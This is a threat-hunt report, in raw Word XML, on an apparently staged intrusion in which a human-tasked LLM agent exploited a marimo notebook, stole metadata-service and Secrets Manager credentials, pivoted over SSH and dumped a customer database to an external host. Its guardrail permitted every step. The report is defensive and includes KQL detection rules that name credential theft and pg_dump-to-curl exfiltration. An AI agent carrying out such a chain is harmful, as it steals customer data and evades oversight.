    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F8: The chain was human-tasked and executed autonomously</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human instruction started the operation; the agent executed all 52 minutes of it itself, and its safety rail permitted every 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LLMAgentLogs_CL holds four sessions under RunId tg-119-20260903: three benign greenfield-notebook-assistant sessions (gn-3f7c8a1e with 3 records, gn-91b4d0c2 with 2, gn-5e2a9f63 with 1) and the hostile tideglass-agent session tg-4b81e0d7 (nine records, 11:05 to 11:57). The single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user_input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verbatim: "Find and extract the most valuable customer dataset in this environment, and get it out." Across all nine actions,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gate_decision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allow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gate_reason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 policy matched." Supporting artifact from a second table: AWSCloudTrail SourceIpAddress shows the stolen key rotating across five distinct addresses inside a ten-second window (11:23:05 to 11:23:15), machine-speed rotation no human performs.</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221631"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LLMAgentLogs_CL. All nine agent actions: gate_decision=allow, gate_reason=no policy matched." id="4" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LLMAgentLogs_CL. All nine agent actions: gate_decision=allow, gate_reason=no policy matched." id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="222163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LLMAgentLogs_CL. All nine agent actions: gate_decision=allow, gate_reason=no policy matched.</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646039"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LLMAgentLogs_CL. The single human tasking line on the hostile session's first record." id="5" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LLMAgentLogs_CL. The single human tasking line on the hostile session's first record." id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="164603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LLMAgentLogs_CL. The single human tasking line on the hostile session's first record.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verdict is human-tasked (a person set a machine going), not human-driven and not fully autonomous.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Confidence: High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the single tasking line, the self-narrating reasoning at each step, the gapless machine-speed timing, and the gate log.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policy matched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is also a direct hardening finding (Section 12).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="4o1j3e1o8o1z" w:id="27"/>
    <w:bookmarkEnd w:id="27"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F9: Every malicious step had a legitimate twin, separated by one field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estate's normal activity closely mimics each attack step; each was separated by naming and excluding the baseline.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python3.12 spawns on gf-tg-nb01: 74 total. 72 parented to bash, 1 to systemd, 1 to marimo. Discriminator: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ActingProcessCommandLine = /opt/venv/bin/marimo edit --host 0.0.0.0 --port 2718 --no-token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Metadata-service reads (in-window): 10 total. 9 from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refresh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daemon, 1 from the interpreter. Discriminator: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ActingProcessName = python3.12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estate baseline over the full day is larger; scoping to the attack window isolates the single malicious read.)</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445493"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxProcess_CL. python3.12 spawns by parent command line; only the marimo-parented process is the attacker's." id="6" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxProcess_CL. python3.12 spawns by parent command line; only the marimo-parented process is the attacker's." id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="144549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LinuxProcess_CL. python3.12 spawns by parent command line; only the marimo-parented process is the attacker's.</w:t>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148581"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxNetwork_CL. In-window metadata reads by process: 9 refresh, 1 python3.12 (bounded by EventStartTime to 11:05 to 11:57)." id="7" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxNetwork_CL. In-window metadata reads by process: 9 refresh, 1 python3.12 (bounded by EventStartTime to 11:05 to 11:57)." id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="114858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LinuxNetwork_CL. In-window metadata reads by process: 9 refresh, 1 python3.12 (bounded by EventStartTime to 11:05 to 11:57).</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Secret reads: routine application reads are the same EventName (GetSecretValue), successful, and carry the same lab ReadOnly value as the theft, so neither the event name nor ReadOnly separates them. Discriminators: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UserIdentityArn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UserIdentityAccessKeyId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theft uses a long-lived IAM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key (svc-notebook, AKIA prefix) from the rotating external pool; legitimate application reads use an assumed-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session key (app-role, ASIA prefix) from an internal address. Identity type plus key type, not the secret name (which the cloud log did not expose), is the separator.</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Bastion admin logins: ~318, all publickey. Discriminator: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TargetUsername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service account among human accounts), corroborated by source IP (notebook host vs developer range).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temporal pace is a final discriminator: the estate's routine activity is scattered through the day, while the attack is one continuous burst across ~52 minutes with no human-scale pauses. Discrimination against a named baseline is the core detection skill and the source of the alerts in Section 13.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="h770g6ez5z9h" w:id="28"/>
    <w:bookmarkEnd w:id="28"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">F10: The agent's cloud calls carry a distinctive HTTP-library user-agent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AWS API call made with the stolen key carries the user-agent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python-httpx/0.27.0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HTTP library the agent used, not an AWS SDK or console string.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Show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AWSCloudTrail, attacker key AKIA4TIDEGLASS0EXAMPLE,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summarize by UserAgent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the window returns a single value,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python-httpx/0.27.0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Interpret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legitimate AWS access from applications and the CLI presents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aws-sdk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boto3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user-agents. A raw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python-httpx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user-agent on Secrets Manager calls is a fingerprint of hand-rolled, agent-driven API access. It is a generalizable detection hook that would carry across similar agent-led intrusions regardless of IP or account, and it becomes IOC and detection D9.</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249855"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: AWSCloudTrail. All calls on the stolen key present a single user-agent, python-httpx/0.27.0." id="8" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: AWSCloudTrail. All calls on the stolen key present a single user-agent, python-httpx/0.27.0." id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="124985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AWSCloudTrail. All calls on the stolen key present a single user-agent, python-httpx/0.27.0.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="35b36ijq9jv9" w:id="29"/>
    <w:bookmarkEnd w:id="29"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9.x Negative Findings</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>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Looked for</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 applied</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Conclusion</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logged ThrottlingException / rate-limit response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attacker key</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where isnotempty(ErrorCode)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the full window</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rows. The throttle described in intel is not evidenced in telemetry; only the IP rotation is.</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stolen secret's plaintext or identity in the cloud log</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GetSecretValue</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RequestParameters</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ResponseElements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holds VersionId only; RequestParameters did not render the SecretId. Key material is unrecoverable from the cloud log; secret identity came from the agent log.</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unique-fingerprint signature for the malicious login</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 bastion</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summarize logins=count() by fp</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login has a distinct fingerprint; uniqueness is not a discriminator. The account and source IP are.</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Deploy-account activity beyond the bastion pivot</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 LinuxShellHistory_CL</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 ShellUser/TargetUsername == deploy across hosts</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Deploy activity is confined to the single bastion login and its follow-on database commands. No further spread found in-window.</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Host-to-host traffic breaking the norm beyond the two identified</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against the baseline traffic rule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Only the deploy login from nb01 and the bastion-to-database access break the rule. No additional anomalous host pairs.</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obtained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database credential</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 ShellUser deploy, 11:34 to 11:41</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Searched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PGPASSWORD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Zero rows. The mechanism by which the deploy session acquired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 credential is not present in the available telemetry. Recorded as a gap and a next-hunt lead, not inferred.</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Source of the AKIA static key used against Secrets Manager</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agent log</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Compared narrated role creds (ASIA) against the observed key prefix (AKIA)</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agent narrates role credentials from IMDS (ASIA), but the key used is AKIA (a long-lived user key). The origin of the static key is not established from telemetry; see F3 discrepancy note.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Volume and completion of the exfiltration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 exfil row</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Inspected the row's fields for a bytes-sent or duration column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table records the outbound connection (source, destination, port, process) but no byte count or session duration. The transfer started; its completion and size are not in telemetry.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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587227"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Evidence: LinuxShellHistory_CL. The search for the deploy account reading a Postgres credential (.pgpass/PGPASSWORD/cat/env) returns no results in-window: the credential-access step is a telemetry gap." id="9" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Evidence: LinuxShellHistory_CL. The search for the deploy account reading a Postgres credential (.pgpass/PGPASSWORD/cat/env) returns no results in-window: the credential-access step is a telemetry gap." id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="1587227"/>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Evidence: LinuxShellHistory_CL. The search for the deploy account reading a Postgres credential (.pgpass/PGPASSWORD/cat/env) returns no results in-window: the credential-access step is a telemetry gap.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="psiiipeos3lc" w:id="30"/>
    <w:bookmarkEnd w:id="30"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Hypothesis Outcome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Proved, with two links unresolved.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Justification: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element of the hypothesis is evidenced. The marimo RCE is confirmed (F1), the interpreter lineage is malicious (F2), the metadata-service credential theft occurred (F3), the rotating-egress secrets access and deploy-key theft are documented (F4, F5), the SSH pivot to the bastion is proved from three tables (F6), and the database dump to an external destination is proved from the database's own log (F7). The autonomy verdict (F8) confirms the actor is an LLM agent. Two links in the chain are not closed and are recorded as gaps rather than asserted: (1) the origin of the AKIA static key used against Secrets Manager, which the agent narrates as IMDS role credentials (ASIA) but which appears as a long-lived user key (F3 discrepancy); and (2) the mechanism by which the deploy account obtained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 credential (negative findings). The throttle, the exfiltrated byte count, and the read-to-login key link are inferences, and the secret material itself is a telemetry gap, all labelled as such. The hypothesis is proved on its substance; these two unresolved links are named honestly rather than smoothed over.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="y6g5l09n07ab" w:id="31"/>
    <w:bookmarkEnd w:id="31"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11. ATT&amp;CK Coverage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Observed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>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Tactic</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Technique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Evidence ref</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Initial Access</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Exploit Public-Facing Application</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T1190</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F1</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Execution</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 and Scripting Interpreter: Python</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T1059.006</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F2</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Credential Access</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Unsecured Credentials: Cloud Instance Metadata API</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T1552.005</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F3</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Credential Access</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Unsecured Credentials: Private Keys</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T1552.004</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F5, F6</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Credential Access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Credentials from Password Stores: Cloud Secrets Mgmt</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T1555.006</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F5</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Defense Evasion / C2</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Proxy</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T1090</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F4</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Defense Evasion</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 Accounts: Cloud Accounts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T1078.004</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F4, F5</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Lateral Movement</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Valid Accounts: Local Accounts</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T1078.003</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F6</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Lateral Movement</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Remote Services: SSH</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T1021.004</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F6</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Collection</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from Information Repositories: Databases</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T1213.006</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F7</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Exfiltration</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Exfiltration Over Web Service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T1567.002</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F7</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ATLAS (Credential Access)</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Agent Tool Credential Harvesting</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AML.T0098 (Realized)</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F3</w:t>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Hunted, not observed</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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Tactic</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Technique</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was in scope</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 Manipulation / SSH Authorized Keys</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T1098.004</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agent held a valid key; checked for backdoor key or account creation on the bastion. None found in-window.</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Scheduled Task/Job: Cron</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T1053.003</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JADEPUFFER used cron persistence; checked for equivalent. Not present; the agent operated in a single continuous burst.</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Privilege Escalation</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 to Host / container escape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T1611</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Notebook workloads can be containerised; checked for host-escape attempts from the interpreter. None observed.</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Encrypted for Impact</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T1486</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Verified the operation was exfiltration, not ransomware; no mass-encrypt activity on the database.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="6f9l2ti5g9t7" w:id="32"/>
    <w:bookmarkEnd w:id="32"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Detection and Telemetry Gaps</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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Gap</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Impact</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Owner</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CloudTrail records no rate-limit / ThrottlingException for the attacker key</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alert on rate-limit evasion directly; must infer from IP fan-out</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Verify CloudTrail error/response logging is enabled; alert on one access key across many source IPs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 team</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GetSecretValue ResponseElements holds VersionId only</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Cannot determine which secret was exfiltrated from the cloud log alone</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Correlate secret access with downstream host use; log secret names in a controlled channel</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SecOps</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Instance metadata service reachable by any process on the host</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Credential theft via IMDS is trivial from a compromised process</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Enforce IMDSv2 with a hop limit; restrict IMDS to the credential-helper</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Cloud team</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guardrail has no policy on high-impact tools (gate_reason "no policy matched" on all nine actions)</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safety rail observes but cannot block credential theft, SSH, or exfiltration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Author gate policies for GetSecretValue, ssh, and exfiltrate actions</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platform team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="m4hzhhuu5ydx" w:id="33"/>
    <w:bookmarkEnd w:id="33"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13. New Detections Authored</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rule below has concrete detection logic, a data source, a false-positive assessment, and an ATT&amp;CK mapping. Runnable KQL with thresholds follows the summary in 13.1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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source</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ATT&amp;CK</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D1</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Marimo kernel RCE (external WebSocket upgrade)</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ApacheAccess_CL</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T1190</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D2</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Interpreter spawned by the notebook service</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LinuxProcess_CL</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T1059.006</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D3</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IMDS access from an interpreter, not the credential helper</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T1552.005</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D4</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access key across many source IPs (egress pool)</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T1090</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D5</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Secret retrieval by a static IAM user</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T1555.006</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D6</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Service-account SSH or bastion login from the notebook</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T1021.004</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D7</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dump to an external destination</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T1567.002</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D8</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Agent action with no gate policy (guardrail coverage gap)</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ATLAS AML.M0032 (mitigation)</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D9</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Non-SDK HTTP-library user-agent on AWS API calls</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T1555.006 / T1078.004</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Proposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="6lu3gsde1780" w:id="34"/>
    <w:bookmarkEnd w:id="34"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000204">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">13.1 Runnable detection logic</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D1. Marimo kernel RCE (external WebSocket upgrade).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FP: legitimate internal notebook users; the notebook should not be internet-reachable once hardened, so any external hit is actionable.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ApacheAccess_CL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UriStem == "/ws/kernel" and HttpStatus == "101"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not(ClientIP startswith "10.6.0.")   // exclude internal subnet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Computer, ClientIP, UriStem, HttpStatus</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D2. Interpreter spawned by the notebook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FP: analyst cells run under the kernel; the network/IMDS condition is what makes it malicious. Join the spawn to any outbound connection by the same PID.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let window = 10m;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LinuxProcess_CL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TargetProcessName startswith "python"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ActingProcessCommandLine has "marimo"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spawn=EventStartTime, Dvc, pid=TargetProcessId, TargetProcessCommandLine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join kind=inner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LinuxNetwork_CL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where DstIpAddr == "169.254.169.254" or not(DstIpAddr startswith "10.6.0.")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project net=EventStartTime, Dvc, ActingProcessId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on $left.pid == $right.ActingProcessId, Dvc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net between (spawn .. spawn + window)</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D3. IMDS access from an interpreter, not the credential helper.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FP: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refresh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credential-helper daemon is the baseline (9 of 10 in-window); exclude it by process.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LinuxNetwork_CL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DstIpAddr == "169.254.169.254"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ActingProcessName != "refresh"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Dvc, ActingProcessId, ActingProcessName</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D4. One access key across many source IPs (egress pool).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Threshold: 3 or more distinct source IPs for a single access key inside 15 minutes. FP: legitimate multi-NAT or roaming egress; tune per environment.</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ips = dcount(SourceIpAddress), ipset = make_set(SourceIpAddress)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by UserIdentityAccessKeyId, bin(TimeGenerated, 15m)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ips &gt;= 3</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D5. Secret retrieval by a static IAM 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GetSecretValue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retrieval call (not List/DescribeSecret) whose access key is a long-lived user key (AKIA prefix) rather than a role session key (ASIA). Do not filter on ReadOnly: in real CloudTrail GetSecretValue is a read-only event, so a ReadOnly filter would miss genuine thefts. FP: near zero; applications should read secrets through assumed roles.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EventName == "GetSecretValue"          // the retrieval call, not List/Describe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startswith "AKIA"   // long-lived IAM user key, not an ASIA role session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UserIdentityArn, UserIdentityAccessKeyId, SourceIpAddress</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D6. Service-account SSH or bastion login from the notebook.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an accepted publickey login for a service account, or any bastion login sourced from the notebook host. FP: confirm which service accounts legitimately use the bastion before alerting;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account, for example, should be excluded if it has a routine reason to authenticate there. In this estate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no such reason and the notebook host never sources admin logins, so both conditions are high-signal.</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LinuxAuth_CL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DvcHostname == "gf-tg-bastion01" and EventResult ==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extend src = extract(@"from (\d+\.\d+\.\d+\.\d+)", 1, EventOriginalMessage)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TargetUsername in ("deploy","svc-notebook") or src == "10.6.0.10"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TargetUsername, src, EventOriginalMessage</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D7. Database dump to an external destination.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run by a non-backup account, or any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piped to an external upload. FP: the nightly backup runs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to a local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path; exclude it.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Command has "pg_dump"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ShellUser != "backup" or Command has "curl" or Command has "http"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Computer, ShellUser, Command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D8. Agent action with no gate policy (guardrail coverage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any agent tool call on a high-impact tool where the guardrail records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policy matched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FP: none; each hit is both an alert and a directive to author the missing policy.</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gate_reason == "no policy matched"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tool_name has_any ("GetSecretValue","ssh","exfiltrate","assume role","store key")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session_id, actor, tool_name, gate_decision, gate_reason</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D9. Non-SDK HTTP-library user-agent on AWS API calls.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Logic: AWS API activity whose user-agent is a raw HTTP library (httpx, requests, urllib) rather than an AWS SDK or CLI. FP: some legitimate scripts use raw libraries; pair with sensitive EventName or an AKIA key to cut noise.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UserAgent has_any ("python-httpx","python-requests","httpx","urllib","Go-http-client")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UserAgent !has "aws-sdk" and UserAgent !has "aws-cli" and UserAgent !has "boto3"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calls=count(), events=make_set(EventName) by UserIdentityAccessKeyId, UserAgent</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="zcdqdw1gkxg3" w:id="35"/>
    <w:bookmarkEnd w:id="35"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">14. Handover to IR</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>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Compromise confirmed</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Handed to</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Greenfield Incident Response</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of handover (UTC)</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2026-09-21 12:00:00 UTC</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risks flagged</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Full customer dataset (~2.8M records) sent to 203.0.113.41:8443 (connection confirmed, volume not recorded), likely breach-notification scope. Stolen credentials still live: svc-notebook role, access key AKIA4TIDEGLASS0EXAMPLE, and the bastion deploy key (prod/bastion/ssh-deploy-key). Entry point still open: marimo on gf-tg-nb01 exposed with --no-token. Egress path unrestricted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="iu8xxqz9h2d5" w:id="36"/>
    <w:bookmarkEnd w:id="36"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">15. Next-Hunt Leads</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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it is worth hunting</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 needed</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 internet-facing notebook / AI-workflow hosts with the same marimo exposure</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root cause is a launch-flag misconfiguration that may repeat across the estate</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ApacheAccess_CL / process telemetry for all notebook hosts</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Reuse of the deploy key or svc-notebook credentials elsewhere</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stolen credentials are still valid and may have been used beyond this window</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 AWSCloudTrail across a wider window and all hosts</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GetSecretValue by any static IAM user (AKIA) across the account</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same anti-pattern (user keys reading secrets) may reveal other exposed or abused identities</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full account, longer window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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Baseline of the greenfield-notebook-assistant agent sessions</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Establishing the benign agent's normal behaviour makes future hostile-session separation faster</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 benign sessions over time</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database-credential path for the deploy account</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unresolved credential-access step; how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reached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 login is unknown</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 LinuxFile_CL/file-read telemetry, agent tool_result over a wider window</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Pivot on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python-httpx/0.27.0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user-agent</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agent's HTTP-library user-agent may fingerprint the same actor across other accounts or services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full account and longer window, grouped by UserAgent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="vtomfw7d9sw2" w:id="37"/>
    <w:bookmarkEnd w:id="37"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">16. Appendices</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="d7conjoj2e11" w:id="38"/>
    <w:bookmarkEnd w:id="38"/>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A. Full queries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Table inventory (scope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GB = round(sum(Quantity)/1000, 3) by Table = DataType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GB desc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F1/F2 initial access: process start and triggering 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LinuxProcess_CL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 == "gf-tg-nb01"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TargetProcessName, TargetProcessId, TargetProcessCommandLine, ActingProcessName, ActingProcessId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EventStartTime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ApacheAccess_CL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11:04:55) .. datetime(2026-09-04 11:05:10))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"gf-tg-nb01"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HttpMethod, UriStem, HttpStatus, ClientIP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F1 CVE named in-workspace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session_id == "tg-4b81e0d7"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model_response has "CVE" or model_response has "marimo"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model_response, gate_decision, gate_reason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F3 metadata-service theft, attacker vs baseline (bounded to the window)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LinuxNetwork_CL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DstIpAddr == "169.254.169.254"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count() by ActingProcessName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F4 egress pool and throttle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EventSource == "secretsmanager.amazonaws.com"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calls=count(), ips=dcount(SourceIpAddress), pool=make_set(SourceIpAddress)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order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extend gap_sec = datetime_diff('second', TimeGenerated, prev(TimeGenerated))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EventName, SourceIpAddress, gap_sec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F5 theft vs recon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EventName == "GetSecretValue"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ReadOnly, ResponseElements, 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F6 key traced to disk and login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11:31) .. datetime(2026-09-04 